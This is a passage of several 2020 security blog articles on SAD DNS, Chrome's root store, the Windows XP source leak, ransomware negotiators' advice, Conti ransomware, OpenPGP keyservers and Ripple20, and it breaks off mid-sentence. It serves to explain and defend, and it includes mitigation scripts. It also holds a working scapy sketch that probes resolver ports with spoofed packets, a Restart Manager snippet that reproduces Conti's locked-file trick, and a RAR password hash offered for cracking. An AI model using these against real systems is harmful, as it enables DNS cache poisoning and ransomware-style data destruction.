4. Before that second elapses, the attacker queries, from his real IP, a UDP port he knows is closed. If the server returns a "port closed" ICMP error... it had not used up its 1,000 ICMP "port closed" errors, and therefore at least one port in that range of 1,000 was open! Bingo. Since the ICMP response limit is global, a single "port closed" response means the budget of 1,000 per second was not exhausted, so some of the probed ports were open. This verification query is made from the attacker's real, unfaked IP precisely so that he receives the response (or its absence).

Thus, in batches of 1,000 queries per second, checking each time whether the budget of "port closed" error packets is exhausted, the attacker can deduce which ports are open. In a short time he will have mapped the server's open ports. Naturally, the attacker combines this with a binary search, splitting the ranges of "potentially open" ports in each batch to converge faster on the specific port (see the sketch after this section). The researchers also had to eliminate the "noise" from other open ports or scans hitting the system while the attack is in progress, and the paper explains formulas for achieving this.

More Failures and Problems

It all stems from a perfect storm of failures in the UDP implementation and in the implementation of the 1,000-response limit. The explanation above is simplistic, because the researchers found other implementation problems that sometimes even helped them, and others that enabled slight variations of the attack. The failure is not only in the implementation of the global ICMP limit; the UDP implementation itself does not get off lightly either. According to the RFC, on a single UDP socket applications can receive connections from different source IPs, and verifying who is given what is left by the RFC to the application handling the incoming connection. This, which is meant for servers (theirs are receiving sockets), also applies to clients. According to the experiments in the paper, it likewise applies to the UDP client that opens ports for queries, which makes the attack much easier by allowing "open" query ports to be scanned from any source IP address.

And something very important: what happens if the UDP implementation marks a response port as "private" (connected), so that only the other party to the connection can reach it and others cannot even see whether it is open or closed? This would hinder the first step of the attack, in which source IPs are faked to speed up the process. Opening "public" or "private" ports depends on the DNS server, and only BIND does this well; Dnsmasq and Unbound do not. In the private case the attacker cannot fake the IPs of the bursts (the probes used to exhaust the global limit, whose responses he does not care about receiving) but must send each burst from a single source IP, which makes the scan slower. But no problem: even with private ports, a Linux flaw keeps the technique viable. The "global limit" check is performed before the per-IP limit count. This was done because checking the global limit is faster than checking the per-IP one, but in practice it means the global budget is still consumed, so the technique remains valid even with private ports.

The paper continues with recommendations for forwarders, resolvers... a thorough review of DNS security.
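A minimal sketch of the inference loop described in the steps above, using the scapy library. The resolver address and port window are hypothetical, and a real attack must also handle per-IP limits, timing and noise, as the paper details:

```python
# Sketch of the SAD DNS port-inference step. Requires root and scapy
# (pip install scapy). Illustrative only: addresses and ports are
# placeholders, and the real attack batches probes as 50 every 20 ms.
from scapy.all import ICMP, IP, UDP, RandIP, send, sr1

TARGET = "192.0.2.1"       # hypothetical victim resolver
KNOWN_CLOSED_PORT = 1      # a port the attacker knows is closed

def window_has_open_port(ports) -> bool:
    """Burn the global ICMP budget with spoofed probes, then test
    whether any budget is left by probing from our real IP."""
    # Each probe to a CLOSED port consumes one ICMP port-unreachable
    # response from the global 1,000-per-second budget; probes to an
    # OPEN port consume nothing.
    for p in ports:
        send(IP(src=RandIP(), dst=TARGET) / UDP(dport=p), verbose=False)
    # If a known-closed port still answers with ICMP, the budget was
    # not exhausted: at least one probed port above was open.
    reply = sr1(IP(dst=TARGET) / UDP(dport=KNOWN_CLOSED_PORT),
                timeout=1, verbose=False)
    return reply is not None and reply.haslayer(ICMP)

# Narrow 1,000-port windows with a binary search, one second per batch.
if window_has_open_port(range(33000, 34000)):
    print("an open ephemeral port lies somewhere in 33000-33999")
```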
Solutions?

Linux already has a patch ready, but there is much more to address: from DNSSEC, which is always recommended but never quite takes off, to disabling ICMP responses, which can be complex. The kernel patch makes the limit no longer a fixed 1,000 responses per second but a random value between 500 and 2,000. The attacker can therefore no longer calculate whether the limit has been exhausted within one second, and so cannot deduce open UDP ports. It seems that the true origin of the problem lies in implementation, not design: the RFC describes the response rate limit and leaves the exact number open. Choosing a fixed value of 1,000, as the kernel did in 2014, is part of the problem. Incidentally, with the BlueCatLabs script scheduled every minute, you can mitigate the problem on a DNS server by doing by hand what the SAD DNS patch will do (see the sketch below). So let's wait for patches for everyone: the operating systems and the main DNS servers. Many public servers are already patched, but many more are not. This attack is particularly interesting because it is very clean for the attacker: he does not need to be on the victim's network and can do everything from the outside, confusing the servers. A disaster. Or a blessing, since thanks to it quite a few loose ends in the UDP and DNS protocols will be fixed.
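The same stop-gap idea as the BlueCatLabs script, as a minimal sketch: periodically re-randomise the global ICMP budget so the attacker's arithmetic no longer works. It assumes a Linux host where the limit lives in the net.ipv4.icmp_msgs_per_sec sysctl, and it must run as root:

```python
# Sketch of the cron-style mitigation described above: re-randomise the
# global ICMP rate limit every minute so an attacker cannot budget
# against a fixed 1,000 responses per second. Assumes Linux and root.
import random
import time

SYSCTL = "/proc/sys/net/ipv4/icmp_msgs_per_sec"

while True:
    limit = random.randint(500, 2000)  # same range as the kernel patch
    with open(SYSCTL, "w") as f:
        f.write(str(limit))
    time.sleep(60)
```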
November 16, 2020
Cyber Security
How Traditional CAs Are Losing Control of Certificates and Possible Reasons Why Chrome Will Have a New Root Store
It's all about trust. This phrase is valid in any field. Money, for example, is nothing more than a transfer of trust: we trust that for a piece of paper that is physically worthless we can obtain goods and services. Trust in browsing comes from root certificates. As long as we trust them, we know our navigation is not being intercepted and we can visit websites and enter data with certain guarantees. But whom should we trust when choosing these root certificates? Those provided by the browser, or those offered by the operating system? Google has made a move and wants its own Root Store.

At First It Was the CA/Browser Forum

This is the forum of the relevant Internet entities (mainly CAs and browsers). It votes and decides on the future of certificates and TLS in general. Or not. Because this year we have seen a relevant manufacturer act independently of the result of a vote and unilaterally apply its own criteria. In 2019 the forum voted on whether to reduce the lifespan of TLS/SSL certificates to one year. The result was no. But it made no difference: the browsers took the floor. In February 2020, Safari unilaterally stated that, from 1 September, it would mark as invalid certificates issued with a validity longer than 398 days. Firefox and Chrome followed suit. The vote among the parties involved (mainly CAs and browsers) was useless. Another example is how Chrome led, in a certain way, the deprecation of SHA-1 certificates by becoming ever more aggressive visually about their validity (red strikethroughs, alerts...), sometimes without being aligned with the deadlines set by the CA/Browser Forum. Nothing bad in itself, and it should not be misunderstood: browsers can provide a certain agility in transitions. The problem is that the interests of the certification authorities, with a clear business plan, do not always coincide with those of the browsers (represented by companies with sometimes opposite interests). In the end, whoever is closest to the user calls the shots. There is no point in a CA deciding to issue certificates valid for more than one year if the browser used by 60% of users is going to mark them as untrustworthy. Popularity, closeness to the user, is a value in itself that Chrome and others exploit (as Internet Explorer did in its day) in order to impose "standards".

The Root Store... Everyone Had Their Own and Now Chrome Wants One

Windows has always had a Root Store with the root certificates it trusts. Internet Explorer and Edge feed on it, and Apple and Android do exactly the same with their own. The most popular browser with an independent Root Store was Firefox, and this sometimes caused problems. In 2016, Firefox was the first to stop trusting WoSign and StartCom because it did not trust their practices; the rest followed immediately. In 2018, Apple, Google and Firefox stopped trusting Symantec certificates, using traditional blocking (by various means) rather than necessarily removing them from their Root Stores. In general, browsers were moving in this direction: if Edge wanted to stop trusting something, Microsoft would take care of it in Windows; if it was Safari, Apple would remove it from the Root Store on the Mac and the iPhone. If Chrome wanted to control whom to trust, it could do so on Android, but... what about Chrome on Windows, on the Mac, on the iPhone... and Chrome on Linux?
That piece was missing from the puzzle, and it made Chrome dependent on the criteria of a third party. Now Chrome wants its own Root Store, so it does not have to depend on anyone. In the statement defending the move, it talks mainly about how this provides homogeneity across platforms. Not all of them: it specifically mentions that on iOS this step is forbidden, so Chrome will continue using the root store imposed by Apple. For the rest, it explains its criteria for inclusion as a trusted root certificate (which, in principle, are the standards), and states that it will of course respond to incidents that undermine trust in a CA.

But why would you want a Root Store? In 2019 Mozilla reminded us once again why it had always maintained its own and why this was necessary: mainly to "reflect its values" (which others may also read as "interests"). But apart from the homogeneity that Mozilla also mentions, one sentence in its explanation hits the nail on the head: "In addition, OS vendors often serve customers in government and industry in addition to their end users, putting them in a position to sometimes make root store decisions that Mozilla would not consider to be in the best interest of individuals." Mozilla does not trust them. It also mentions that when the operating system inserts traffic-inspection certificates into its Root Store (as some antivirus products do), this does not affect Firefox. Always putting individual freedoms first, as it did by imposing DoH and forcing a certain choice between security and privacy.

What about Google's motivations? Will they be similar? On paper, yes: they want homogeneity. But let's not forget that, as Mozilla subtly reminded us, whoever controls the Root Store independently of the operating system can also decide who, at any given moment, can access the encrypted traffic. Apart from being a headache for administrators. So in the end it seems to be, again, a question of trust... or perhaps of mistrust? Chrome, now mature and with great influence on the market, wants us to trust it and its policy of access to the Root Store. In the light of the reasons given by Mozilla, could this not in turn be read as a slight mistrust of the platforms where Chrome runs? Is it not a further step in the distancing from the CAs themselves? An attempt, after all, to gain more control?
November 9, 2020
Cyber Security
Curiosities About the Windows XP Code Leak
A few days ago, attention focused on Reddit, within a community characterised by its conspiracy theories. According to the news, 43 GB of "Windows XP" data had been leaked but, according to the more accurate name of the torrent, what was leaked was a "Microsoft leaked source code archive", because it actually contained much more. It is a compilation of previous leaks, documents, documentaries, images... and yes, unpublished source code. More than half of the content is in fact made up of Microsoft patents, up to 27 GB in compressed form. Let's have a look at other curiosities.

Directory and File Analysis

Here is an example of what can be downloaded. The torrent description itself makes this clear. Included in this torrent are:

- MS-DOS 3.30 OEM Adaptation Kit (source code)
- MS-DOS 6.0 (source code)
- DDKs / WDKs stretching from Win 3.11 to Windows 7 (source code)
- Windows NT 3.5 (source code)
- Windows NT 4 (source code)
- Windows 2000 (source code)
- Windows XP SP1 (source code)
- Windows Server 2003 (build 3790) (source code) (file name is 'nt5src.7z')
- Windows CE 3.0 Platform Builder (source code)
- Windows CE 4.2 Shared Source (source code)
- Windows CE 5.0 Shared Source (source code)
- Windows CE 6.0 R3 Shared Source (source code)
- Windows Embedded Compact 7.0 Shared Source (source code)
- Windows Embedded Compact 2013 (CE 8.0) Shared Source (source code)
- Windows 10 Shared Source Kit (source code)
- Windows Research Kernel 1.2 (source code)
- Xbox Live (source code) (most recent copyright notice in the code says 2009)
- Xbox OS (source code) (both the "Barnabas" release from 2002, and the leak that happened in May 2020)

The most relevant items are the Windows XP SP1 and Server 2003 trees since, about the rest, much was already known from previous leaks. For example, in May 2020 the original Xbox and NT 3.5 code was leaked; in 2017, some parts of Windows 10; and in 2004, some parts of NT and 2000. The PDF section is not to be missed either, mostly because of the value of gathering so much documentation and news about code disclosures in one place.

A Mysterious Encrypted RAR

The leak contains an encrypted RAR (Windows_xp_source.rar), and the person who included it appeals to the community to try to crack the password: "Including 'windows_xp_source.rar' in this collection, even though it's password protected. Maybe someone can crack (or guess) the password and see what's inside. The archive is bigger than the other XP / Neptune source tree. It might be genuine, it might not. But I'm including it just in case, since the file was so hard to track down. Original upload date seems to have been around 2007 or 2008. The hash key is: $RAR3$*0*c9292efa2e495f90*044d2e5042869449c10f890c1cced438"

Is This Relevant?

What is important, and seems to be new, is the source code of the NT 5 kernel from 2003, largely shared by XP as well: nt5src.7z, which is about 2.4 GB compressed and around 10 GB decompressed. The code seems very complete, but it is not known whether it contains enough to be compiled. The vast majority of the files are dated 2 September 2002; the Service Pack was officially released on the 9th. As to whether this leak is a security threat: it will help detect or analyse, much faster, potential vulnerabilities that are still preserved in Windows 10 through inherited code. Attackers will be able, once a potential flaw has been identified, to understand far better why it occurs by going straight to the relevant portion of clear source code.
And not just the parts inherited by Windows 10: Windows XP and 2003 themselves are still found on a good number of important systems. Truth be told, since 2014, when their support ended, administrators who still run these systems have had other problems to worry about; but this leak can make things worse. Not dramatically so, but it matters. In any case, any researcher looking for vulnerabilities in the code would start with the comments, where programmers record their doubts, fears and... potential cracks. A simple search for "WARNING:" gives us an interesting idea of what can go wrong in the code, according to the programmers themselves (a search sketch follows at the end of this article). Some are mere curiosities and others could be seen as potential security problems. Here are some examples: "It makes no checks on buffer...", "It could break everything...", "It is very annoying to look at...", "Never ever change the order or you break backwards compatibility...", "Overflow...", "I really don't like this but..."

The JlJmIhClBsr String

We did not want to forget that, in the code related to file sharing, the string JlJmIhClBsr appears. This is curious because it can indicate that the NSA already had access to the Windows code (which would not be strange at all), but it also implies that the NSA made a mistake when creating the EternalBlue exploit. By including that string, which was in the source code for reasons that are not well understood, the exploit was adding (without being aware of it) a highly relevant IDS signature revealing when someone was being attacked with EternalBlue. This is very curious because it would also imply that the NSA created the exploit by fixing or adapting the source code directly. When the exploit was made public, WannaCry, built on EternalBlue, also inherited that string. It was useless, however, and when the exploit was ported to Metasploit it was simply removed. At the time, we investigated and verified that in reality this JlJmIhClBsr string would serve only one purpose: as a perfect signature or marker to detect the network attack. A misstep by the NSA.

Part of the svrcall.c code
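As an illustration of the comment triage mentioned above, a minimal sketch that walks a source tree and flags lines containing worrying markers. The directory name and the marker list are illustrative assumptions:

```python
# Walk a leaked source tree and list C/C++ files whose lines contain
# worrying comment markers, in the spirit of the "WARNING:" search
# described above. Paths and markers are illustrative.
import os

MARKERS = ("WARNING:", "HACK", "overflow", "no checks")

def scan_tree(root: str) -> None:
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".c", ".h", ".cpp")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as f:
                    for lineno, line in enumerate(f, 1):
                        if any(m.lower() in line.lower() for m in MARKERS):
                            print(f"{path}:{lineno}: {line.strip()}")
            except OSError:
                pass  # unreadable file: skip it

scan_tree("nt5src")  # hypothetical extraction directory
```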
September 28, 2020
Cyber Security
What Do Criminals in the Ransomware Industry Recommend so that Ransomware Does Not Affect You?
We all know the security recommendations offered by professionals on malware protection. Frequently: use common sense (personally, one of the least applicable and most abstract pieces of advice that can be given), use an anti-virus, a firewall (?)... All good intentions that are not practical: much repeated, yet not very effective. Users and companies still get infected. So what if, for a change, we listen to the creators of ransomware themselves? Would they not have a more practical and realistic vision of what to do to avoid their own attacks? What are their recommendations against their own kind?

First of all, a distinction must be made between homemade ransomware and professional ransomware. In the first, the target is any individual's computer at random; whoever fails to apply basic protection advice can be affected. The second is ransomware developed with a specific company as its target. The attackers will spend months planning the attack, probably weeks inside the network, and within minutes they will encrypt everything they can and demand a multi-million ransom. Once affected, little can be done. Garmin recently paid, and so has CWT, a US business travel and event management company that has just paid $4.5 million to decrypt its own data. The negotiation with the attackers took place over chat and has been made public; the transcript reads like any business deal between professionals. Let's go through the recommendations the "bad guy" negotiator made to the CWT representative and analyse how effective they are.

Anti-Ransomware Recommendations

It is worth stressing that these are recommendations from the attackers themselves, intended for large companies targeted by professional ransomware. Let's check them out and analyse whether they are suitable.

List of recommendations. Source: Twitter, Jack Stubbs

Disable local passwords

On systems and servers managed through a Domain Controller, it is a good idea not to use local users and to rely on domain accounts instead. This improves traceability and reduces exposure. Good recommendation.

Force the end of administrators' sessions

When attackers are already moving comfortably through the network, they will try to escalate to domain administrator and open sessions with it; otherwise they cannot encrypt everything important, including the backups. It is a good idea for these sessions to expire and to be fully monitored.

Avoid WDigest (Digest Authentication, used in LDAP), which stores passwords in memory

Here the attacker is almost certainly alluding, in a veiled way, to Mimikatz and how it recovers the domain administrator password from memory to escalate privileges. If a certain Windows registry value is set to zero, the password is no longer kept in the clear and elevation becomes much harder for the attackers (see the registry sketch at the end of this article). Excellent recommendation.

Monthly password updates

There is a lot of controversy about password rotation. Users find monthly updates tedious and end up writing passwords down or following a pattern. But for administrators (which is where the criminals aim) it makes sense. Attackers may spend more than a month inside a network without revealing themselves, studying the best moment to launch the most effective attack. Changing passwords they have probably already obtained can force them to rethink the attack and may undo much of their work. Interesting recommendation.
Reduce user permissions to the essential minimum

A common recommendation. It very probably also alludes to how attackers manage to escalate from a simple user thanks to negligent segmentation of permissions and privileges.

AppLocker and only the necessary applications

This is every network administrator's dream: a whitelist of applications that users can run, ignoring everything else. AppLocker, already integrated in Windows, is enough for this. It works very well and allows limits by certificate, location, etc. Attackers would not be able to download their tools and launch them to escalate privileges. It is an excellent measure, complex to implement yet not impossible.

Don't count on anti-virus in the short term

Unfortunately, we have explained this on many occasions: the anti-virus (as such) is not the best solution for early detection. "Don't count on them." Here the attacker claims that anti-virus can work in the long term, as something reactive, and unfortunately he is right. Anti-virus is a reactive element, and that is where it works best: as a system for detecting and eradicating an infection once it has already occurred. For prevention, a much broader set of measures is reasonable. He also points out that the anti-virus is only useful if the attacker "for some reason does not attack in a short term", suggesting that professional attackers are rarely impulsive: they take their time to analyse the victim and strike effectively.

Install an EDR (Endpoint Detection and Response) and have efficient technicians work with it

An EDR is more than an anti-virus: it is aimed at early detection, analysing in real time what is happening on the system, beyond traditional anti-virus signatures. And yes, that can be useful. But the subtle touch the attacker adds is interesting: not just using it, but having "the technicians work with it". As with any software, there is no point in deploying an EDR if it is not properly configured, understood, worked on and monitored.

Work 24/7

For large companies, the attacker recommends three eight-hour shifts of administrators, covering 24 hours a day. This implies that attackers look for moments when administrators are not working to launch attacks, lateral movements or privilege escalations. If they manage to act without alarms being raised (and checked), they can cover their tracks. Full shifts of "human surveillance" are therefore important.

Conclusions

Bearing in mind that they have just charged $4.5 million for a ransom they themselves provoked, the attacker undoubtedly belongs to a professional group that knows exactly what it is doing. The recommendations seem sincere and, although it may seem counterproductive, aimed at hindering their own work. Why reveal these tricks? They communicate them exclusively to their victim (who, let's recall, has just paid) as an act of professionalism. They have completed a transaction between "professionals" for a service, and so they throw in a "bonus" of information. Like the plumber who, after fixing a blocked pipe and while writing the invoice, advises you on how to prevent the sink from clogging again. No plumber would withhold that little tip for fear of losing future business.
On the contrary, as a good professional, the attacker needs to generate confidence: the next time he attacks a big company and demands a few million, he wants them to know that paying is the best option for recovering their data. Treat your present and future clients well... even if they are victims. And even if these tips have leaked, we can assume they do not really mind. There are thousands of large companies out there who will not listen, whether through ignorance or lack of resources, and they will remain potential victims. Attackers can afford to give advice on how to stop them and still enjoy a large enough attack surface to maintain a prosperous business.
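As a footnote to the WDigest recommendation above, a minimal sketch of the hardening the attacker alludes to. UseLogonCredential is the widely documented registry value involved, but verify the exact key path for your Windows build; the script must run as administrator:

```python
# Set UseLogonCredential to 0 so LSASS stops caching plaintext WDigest
# credentials that tools like Mimikatz could recover. Windows only;
# run as administrator. Key path is the commonly documented one.
import winreg

KEY = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, KEY, 0,
                        winreg.KEY_SET_VALUE) as k:
    winreg.SetValueEx(k, "UseLogonCredential", 0, winreg.REG_DWORD, 0)

print("WDigest plaintext credential caching disabled")
```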
August 4, 2020
Cyber Security
Conti, the Fastest Ransomware in the West: 32 Parallel CPU Threads, but… What for?
Anyone who thinks that "retail" ransomware, which infects end users' systems and demands a ransom, is the real threat may not be aware of the ransomware used against company networks. After years among us, ransomware has developed: it has industrialised, specialised and acquired a sophisticated appearance in order to target far more lucrative victims. Conti, the fastest ransomware, is just one example of the speed at which they are developing. Let's look at some of its tricks and why they are used. Carbon Black has led the analysis of Conti's latest version, discovering new levels of sophistication, because the real action and true innovation in malware takes place in attacks directed at companies. These attacks usually arrive disguised as regular e-mails with attached files, such as an Excel or Word file with macros or one that exploits Office vulnerabilities. The attackers move laterally until they settle on a specific server and wait to strike. From there, they launch data-hijacking attacks and demand multi-million ransoms in exchange for letting the company continue its normal operation. The "retail" ransomware that affects user systems is an annoying prank compared to this. But let's see how these attackers have become more sophisticated, and why.
The Fastest in the West
Conti uses 32 simultaneous CPU threads. These allow it to quickly encrypt a whole hard disk, or any other file that gets in its way. It is like launching 32 copies of a "normal" ransomware in parallel. Why do they do this? Why do they want to go so fast? These attacks are usually launched once the attackers are already lodged on a powerful server enjoying all the privileges within the company's network (normally the domain controller). The system is assumed to be powerful in CPU and capable of running all these threads. It also lets them attack systems whose hard disks store large amounts of data (including backups). The faster the ransomware, the easier it is to go unnoticed by any alert system, whether reactive or preventive. It will always be too late.
Hide the Hand That Throws the Stone
Another interesting feature of Conti is that, again lodged on a server, it can attack the surrounding network and encrypt the shared drives of neighbouring systems. This way, network administrators will not know where the attack is coming from, because it is natural to think that the machine containing the encrypted files is the infected one. Not at all: patient zero can be far away, triggering very fast encryptions willy-nilly.
Avoid Making Noise Using ARP
To find out which machines are around you, you have two options: analyse the IPs of the network itself and sweep the whole range, or run arp -a and see which machines you have recently contacted. The latter is exactly what Conti does.
For Conti, a Locked File Is Not a Problem
If you are on a server with a busy database, its data files will normally be "locked" by the operating system or the database itself. Encrypting them would be impossible, because you cannot handle a file that belongs to a process holding it exclusively. From the attackers' point of view: how to encrypt it then? First, Conti kills any process with "sql" in its name. Very few families also use the trick this ransomware employs to encrypt such files: Restart Manager, the mechanism Windows itself uses to cleanly kill processes before shutting down the operating system.
It cleanly kills processes just as Windows does before rebooting, but without the need to reboot. And this is also where speed matters, and another reason for the 32 threads: killing a critical process is very noisy, and administrators will notice right away that something is going wrong. From the malware's point of view, if there are many heavy files, the best option is to encrypt them quickly right after killing the parent process.
Encrypts All Extensions Except exe, dll, lnk and sys
Conti is very aggressive. Most "homemade" ransomware looks for extensions potentially useful to the victim: documents, photos, data, etc. Conti encrypts everything except executables, libraries and drivers. To speed things up, it skips some system directories. Of course, none of this prevents the ransomware from including the usual technologies for this type of attack, from the deletion of shadow copies (although in a special way) to the public keys that encrypt the 256-bit AES key embedded in each encrypted file. Finally, the analysis of this sample is all the more valuable because the malware obfuscates its own code in a special way: Conti tries to hide every string and every system API call, using a different algorithm with different keys for each one, up to 277 functions (algorithms) used internally just to de-obfuscate itself "on the fly".
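Going back to the locked-file trick: the Restart Manager API is public and can be driven from any language. Here is a minimal, hedged sketch in Python with ctypes (the file path is illustrative, and this is of course not Conti's code) of how a program asks Windows to cleanly release a locked file:

import ctypes
from ctypes import wintypes

# Load the Restart Manager API (shipped with Windows since Vista).
rstrtmgr = ctypes.WinDLL("Rstrtmgr")
CCH_RM_SESSION_KEY = 32
RM_FORCE_SHUTDOWN = 1  # forcibly but cleanly stop processes holding the resources

session = wintypes.DWORD()
key = ctypes.create_unicode_buffer(CCH_RM_SESSION_KEY + 1)
if rstrtmgr.RmStartSession(ctypes.byref(session), 0, key) != 0:
    raise OSError("RmStartSession failed")
try:
    # Register the locked file (illustrative path) with the session.
    locked = (ctypes.c_wchar_p * 1)(r"C:\data\locked.mdf")
    rstrtmgr.RmRegisterResources(session, 1, locked, 0, None, 0, None)
    # Ask Windows to cleanly shut down every process holding the file,
    # exactly as it would before a reboot, but without rebooting.
    rstrtmgr.RmShutdown(session, RM_FORCE_SHUTDOWN, None)
finally:
    rstrtmgr.RmEndSession(session)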
July 27, 2020
Cyber Security
OpenPGP: Desperately Seeking Kristian
A year ago, OpenPGP was suffering from a problem of vandalism on its key servers. The system was dying and needed a change that was not trivial to make without betraying principles rooted in a 1990s Internet, naive by today's standards. Recently, a simple anecdote has once again exposed some serious shortcomings, an anachronism unworthy of today's networks: an unbreakable will, unable to adapt to the new times, that keeps seeking Kristian desperately.
What's Happened?
Key servers (SKS) are essential to the OpenPGP infrastructure. They ensure that we can locate people's public keys. They allow these keys to be incorporated into the system, never lost, and replicated to provide availability. To interact with them, the OpenPGP HTTP Keyserver Protocol (HKP) is used: through port 11371, keys can be uploaded and searched. Public servers have never worked properly, and they have too many shortcomings. To test this, just connect to any key server (such as https://pgp.mit.edu) and search for keys. After several server errors (and adapting the eye to the 90s aesthetics), you may get an answer. It's the same with https://keys.gnupg.net, https://pgp.key-server.io or any other. Unreliable, poorly maintained servers underpin this piece of public cryptography. HKP over TLS is called HKPS. The hkps.pool.sks-keyservers.net server is responsible for the "pool" of HKPS servers: it brings them together, arranges and "sorts" them from a DNS point of view so that they can be known and coordinated. To join the pool, servers must be validated and certified by the pool's own CA, which allows their encrypted communication. This CA has been maintained manually by a single person for more than 10 years: Kristian Fiskerstrand. The point is that the certificate of Todd Fleisher, who manages one of those servers, was about to expire: the certificate that allowed him to communicate with the main server and stay within the pool, coordinated with the remaining servers. He tried "desperately" to contact Kristian for a month. Time was against him. Kristian gave no sign of life, neither by mail nor on social networks. Finally, the certificate expired, and Fleisher had to get one from Let's Encrypt just to keep encrypting communications. He was aware that the pool hkps.pool.sks-keyservers.net would not trust it, but at least it allowed him to keep working, albeit without synchronisation. Shortly afterwards, Kristian replied. Without giving any further reasons, he said he had been busy with other matters during the last month. He renewed the certificate. If it had taken any longer, the other servers' certificates would have expired, and the pool would have ignored them.
Why Did This Happen?
Because a centralised critical point (the very thing that makes the decentralised use of OpenPGP possible) is in the hands of a single person who maintains it voluntarily. A system from another decade (and not even the last one), prone to errors and failures and dependent on good will. Romantic but impractical. We love free software, but let's not forget that it also requires funding so that not just one person but a team can invest the corresponding time. Because we're talking about a free encryption system whose grandfather was the standard-bearer of cypherpunk in the 90s, and which Phil Zimmermann fought for. Let's remember that until the year 2000, the export of cryptography outside the United States was very limited. This is not the only problem with OpenPGP.
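Incidentally, the HKP interface mentioned above is extremely simple. A hedged sketch (the keyserver host and search string are illustrative) of querying a server's machine-readable key index over port 11371:

import urllib.parse
import urllib.request

server = "keyserver.ubuntu.com"   # illustrative HKP server
search = "someone@example.com"    # illustrative search string

# op=index lists matching keys; options=mr asks for machine-readable output.
url = ("http://%s:11371/pks/lookup?op=index&options=mr&search=%s"
       % (server, urllib.parse.quote(search)))
with urllib.request.urlopen(url, timeout=10) as resp:
    print(resp.read().decode("utf-8", "replace"))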
Thunderbird, a classic that has experienced all kinds of problems (Mozilla wanted to get rid of it for a while to focus its efforts on Firefox), brought good news. In October 2019 Mozilla announced that it wanted to add native OpenPGP support to its Thunderbird email client. This meant retiring the Enigmail extension, the reigning tool for managing S/MIME and OpenPGP in mail. This fact brought to light some realities of the software world that, in the field of free and open source, are perhaps more surprising because of the expectations generated. Enigmail works almost miraculously: its interface makes command-line calls and collects the result, which it redraws in Thunderbird, with all the problems that this can entail. It is certainly not an ideal scenario, but it has worked this way for many, many years and nothing better has come up. Enigmail is a project of a few people working in their free time and living on donations. They have been maintaining it for over 15 years and, when they learned it was going to be killed, they even offered to help the Thunderbird development team integrate it natively. Even so, Thunderbird had to face licensing issues to incorporate encryption into its client natively, and there was a condition: if the effort made Mozilla lose focus on Firefox, it wouldn't be worth it. It now seems that it's almost integrated; we can see the following message in the latest versions of Thunderbird: This essentially means that, for a while, they haven't been able to make the two systems compatible: neither Enigmail nor the new integrated system works well in the latest versions. They haven't had time. So, for a period, you have to stick with an outdated version of Thunderbird if you want to use OpenPGP with Enigmail.
What Else Is Going to Happen?
A critical system can't be maintained on good will alone. It requires a critical mass of use (beyond promotion), investment (not just donations), collaborations (beyond good words), infrastructure and people. Above all, people. A critical part of the system cannot depend on literally one single technician, because that puts all its functionality at risk. Free software can't keep seeking Kristian desperately.
June 29, 2020
Cyber Security
Ripple20: Internet Broken Down Again
This time, we find that Ripple20 affects the TCP/IP stack implementation of billions of IoT devices. The bugs are being talked about as 0-days, but they are not (there is no evidence that they have been exploited by attackers) and, besides, some of them had already been fixed before being announced. This does not make these vulnerabilities any less serious, though. Given the large number of exposed devices, has the Internet broken down again? The Department of Homeland Security and the CISA ICS-CERT announced it: there are 19 different issues in the implementation of Treck's TCP/IP stack. As this implementation is supplied to or licensed by a multitude of brands (almost 80 identified) and IoT devices, the affected devices do indeed number in the billions. And, by nature, many of them will never be patched.
What Happened?
JSOF has performed a thorough analysis of the stack and found all kinds of issues. A meticulous audit inevitably turned up four critical vulnerabilities, many serious ones and other minor ones. They could allow everything from full control of the device to traffic poisoning and denial of service. The reason for optimism is that they developed an eye-catching logo and name for the bugs and reported the vulnerabilities privately, so many have already been fixed by Treck and other companies using their implementation. The reasons for pessimism are that others have not been fixed, and that it is difficult to trace the affected brands and models (66 brands are pending confirmation). In any case, another important fact to highlight is that these devices often sit in industrial plants, hospitals and other critical infrastructure, where a serious vulnerability could trigger horrible consequences. So the only thing left to do is to audit, understand and mitigate the issue case by case, to know whether a system is really at risk. This should already be happening under a mature security plan (including OT environments) but, in any case, it could serve as an incentive to achieve one. Why? Because these are serious, public bugs in the guts of devices used for critical operations: a real sword of Damocles. In any case, they are now known, so it is possible to protect ourselves or mitigate the problem, as happened in the past with other serious problems affecting millions of connected devices. With those, too, it seemed that the Internet was going to break down, but we kept going. And the reason was not that they were not serious (some were probably even exploited by third parties), but that we knew how to respond to them in time and form. We should not underestimate them; rather, we should continue to attach importance to them so that they do not lose it, while always avoiding catastrophic headlines. Let us review some historical cases.
Other "Apocalypses" in Cybersecurity
There have already been other cases of disasters that were going to affect the network as we know it, and about which many pessimistic headlines were written. Let us look at some examples. The first was the "Y2K bug". Although it did not have an official logo, it did have its own brand (Y2K). Those were other times and, in the end, it was a kind of apocalyptic disappointment resulting in a lot of literature and some TV films. The 2008 Debian cryptographic apocalypse: a line of code in the OpenSSL package that helped generate entropy when calculating public and private key pairs was removed in 2006. The keys generated from then on were predictable and therefore neither reliable nor secure.
Kaminsky and DNS in 2008: this was an inherent flaw in the protocol, not an implementation issue. Dan Kaminsky discovered it without providing details. A few weeks later, Thomas Dullien published on his blog his particular vision of what the problem could be, and he was right: it was possible to forge (through the continuous sending of certain traffic) the responses of the authoritative servers of a domain. Twelve years later, even after that catastrophe, DNSSEC is still "a rarity". "Large-scale" spying with BGP: in August 2008, people were talking again about the greatest known vulnerability on the Internet. Tony Kapela and Alex Pilosov demonstrated a technique (until then believed to be theoretical) that allowed Internet traffic to be intercepted on a global scale. This was a design flaw in the Border Gateway Protocol (BGP) that would allow all unencrypted Internet traffic to be intercepted and even modified. Heartbleed in 2014 again made it possible to extract private keys from exposed servers. In addition, it created the "branded" vulnerability, because the apocalypse must also be sold: a logo and a dedicated page were designed with a template that would become the standard, a domain was reserved, a communication campaign of sorts was orchestrated, exaggerations were spread, care was taken over timing, etc. It opened the path to a new way of notifying, communicating and spreading security bugs, although curiously the short-term technical effect was different: the certificate revocation system was put to the test and, indeed, it was not up to the task. Spectre/Meltdown in 2017 (and many other processor bugs since then): this type of flaw had some very interesting elements to count as an important innovation. These were hardware design flaws in the processor. Rarely had we witnessed a note on CERT.org where it was so openly proposed to change the hardware in order to fix an issue. However, looking back, so far it seems that none of these vulnerabilities has ever been used as a method of massive attack to 